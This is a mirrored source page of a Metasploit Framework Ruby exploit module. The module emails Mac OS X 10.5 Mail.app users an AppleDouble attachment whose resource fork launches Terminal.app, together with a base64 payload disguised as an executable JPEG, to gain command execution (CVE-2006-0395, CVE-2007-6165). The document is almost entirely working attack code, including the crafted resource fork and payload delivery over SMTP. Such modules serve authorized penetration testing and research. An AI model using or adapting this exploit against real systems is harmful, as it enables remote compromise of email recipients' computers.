CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/osx/email/mailapp_image_exec.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ManualRanking

8


9
  #

10
  # This module sends email messages via smtp

11
  #

12
  include Msf::Exploit::Remote::SMTPDeliver

13
  include Msf::Exploit::EXE

14


15
  def initialize(info = {})

16
    super(update_info(info,

17
      'Name'           => 'Mail.app Image Attachment Command Execution',

18
      'Description'    => %q{

19
          This module exploits a command execution vulnerability in the

20
        Mail.app application shipped with Mac OS X 10.5.0. This flaw was

21
        patched in 10.4 in March of 2007, but reintroduced into the final

22
        release of 10.5.

23
      },

24
      'License'        => MSF_LICENSE,

25
      'Author'         =>  ['hdm', 'kf'],

26
      'References'     =>

27
        [

28
          ['CVE', '2006-0395'],

29
          ['CVE', '2007-6165'],

30
          ['OSVDB', '40875'],

31
          ['BID', '26510'],

32
          ['BID', '16907']

33
        ],

34
      'Stance'         => Msf::Exploit::Stance::Passive,

35
      'Payload'        =>

36
        {

37
          'Space'       => 8192,

38
          'DisableNops' => true,

39
          'BadChars'    => "",

40
          'Compat'      =>

41
            {

42
              'ConnectionType' => '-bind -find',

43
            },

44
        },

45
      'Platform'       => %w{ unix osx },

46
      'Targets'        =>

47
        [

48
          [ 'Mail.app - Command Payloads',

49
            {

50
              'Platform'       => 'unix',

51
              'Arch'           => ARCH_CMD,

52
              'PayloadCompat' => {

53
                'RequiredCmd'    => 'generic perl ruby bash-tcp telnet',

54
              }

55
            }

56
          ],

57
          [ 'Mail.app - Binary Payloads (x86)',

58
            {

59
              'Platform'       => 'osx',

60
              'Arch'           => ARCH_X86,

61
            }

62
          ],

63
          [ 'Mail.app - Binary Payloads (ppc)',

64
            {

65
              'Platform'       => 'osx',

66
              'Arch'           => ARCH_PPC,

67
            }

68
          ],

69
        ],

70
      'DisclosureDate' => '2006-03-01'

71
      ))

72


73
  end

74


75
  def autofilter

76
    false

77
  end

78


79
  def exploit

80


81
    exts = ['jpg']

82


83
    gext = exts[rand(exts.length)]

84
    name = rand_text_alpha(5) + ".#{gext}"

85
    data = rand_text_alpha(rand(32)+1)

86


87
    msg = Rex::MIME::Message.new

88
    msg.mime_defaults

89
    msg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1)

90
    msg.to = datastore['MAILTO']

91
    msg.from = datastore['MAILFROM']

92


93
    dbl = Rex::MIME::Message.new

94
    dbl.header.set("Content-Type", "multipart/appledouble;\r\n    boundary=#{dbl.bound}")

95
    dbl.header.set("Content-Disposition", "inline")

96


97
    # AppleDouble file version 2

98
    # 3 entries - 'Finder Info', 'Real name', 'Resource Fork'

99
    # Real Name matches msf random generated 5 character name - (I cheated ala gsub)

100


101
    resfork =

102
    "AAUWBwACAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAJAAAAPgAAAAoAAAADAAAASAAAAAkAAAACAAAA\r\n" +

103
    "UQAABToAAAAAAAAAAAAASGVpc2UuanBnAAABAAAABQgAAAQIAAAAMgAAAAAAAAAAAAAAAAAAAAAA\r\n" +

104
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +

105
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +

106
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +

107
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQA\r\n" +

108
    "AAAlL0FwcGxpY2F0aW9ucy9VdGlsaXRpZXMvVGVybWluYWwuYXBwAOzs7P/s7Oz/7Ozs/+zs7P/s\r\n" +

109
    "7Oz/7Ozs/+Hh4f/h4eH/4eHh/+Hh4f/h4eH/4eHh/+Hh4f/h4eH/5ubm/+bm5v/m5ub/5ubm/+bm\r\n" +

110
    "5v/m5ub/5ubm/+bm5v/p6en/6enp/+np6f/p6en/6enp/+np6f/p6en/6enp/+zs7P/s7Oz/7Ozs\r\n" +

111
    "/+zs7P/s7Oz/7Ozs/+zs7P/s7Oz/7+/v/+/v7//v7+//7+/v/+/v7//v7+//7+/v/+/v7//z8/P/\r\n" +

112
    "8/Pz//Pz8//z8/P/8/Pz//Pz8//z8/P/8/Pz//b29v/29vb/9vb2//b29v/29vb/9vb2//b29v/2\r\n" +

113
    "9vb/+Pj4//j4+P/4+Pj/+Pj4//j4+P/4+Pj/+Pj4//j4+P/8/Pz//Pz8//z8/P/8/Pz//Pz8//z8\r\n" +

114
    "/P/8/Pz//Pz8////////////////////////////////////////////////////////////////\r\n" +

115
    "/////////////////////6gAAACoAAAAqAAAAKgAAACoAAAAqAAAAKgAAACoAAAAKgAAACoAAAAq\r\n" +

116
    "AAAAKgAAACoAAAAqAAAAKgAAACoAAAADAAAAAwAAAAMAAAADAAAAAwAAAAMAAAADAAAAAwAAAAAA\r\n" +

117
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +

118
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +

119
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +

120
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +

121
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +

122
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +

123
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +

124
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +

125
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +

126
    "AAAAAQAAAAUIAAAECAAAADIAX9CsEsIAAAAcADIAAHVzcm8AAAAKAAD//wAAAAABDSF8" + "\r\n"

127


128
    fork = Rex::Text.encode_base64( Rex::Text.decode_base64(resfork).gsub("Heise.jpg",name), "\r\n" )

129


130
    cid = "<#{rand_text_alpha(rand(16)+16)}@#{rand_text_alpha(rand(16)+1)}.com>"

131


132
    cmd = ''

133


134
    if (target.arch.include?(ARCH_CMD))

135
      cmd = Rex::Text.encode_base64(payload.encoded, "\r\n")

136
    else

137
      bin = generate_payload_exe

138
      cmd = Rex::Text.encode_base64(bin, "\r\n")

139
    end

140


141


142
    dbl.add_part(fork , "application/applefile;\r\n    name=\"#{name}\"", "base64", "inline;\r\n    filename=#{name}" )

143
    dbl.add_part(cmd , "image/jpeg;\r\n    x-mac-type=0;\r\n    x-unix-mode=0755;\r\n    x-mac-creator=0;\r\n    name=\"#{name}\"", "base64\r\nContent-Id: #{cid}", "inline;\r\n    filename=#{name}" )

144


145
    msg.parts << dbl

146


147
    send_message(msg.to_s)

148


149
    print_status("Waiting for a payload session (backgrounding)...")

150
  end

151
end

152


153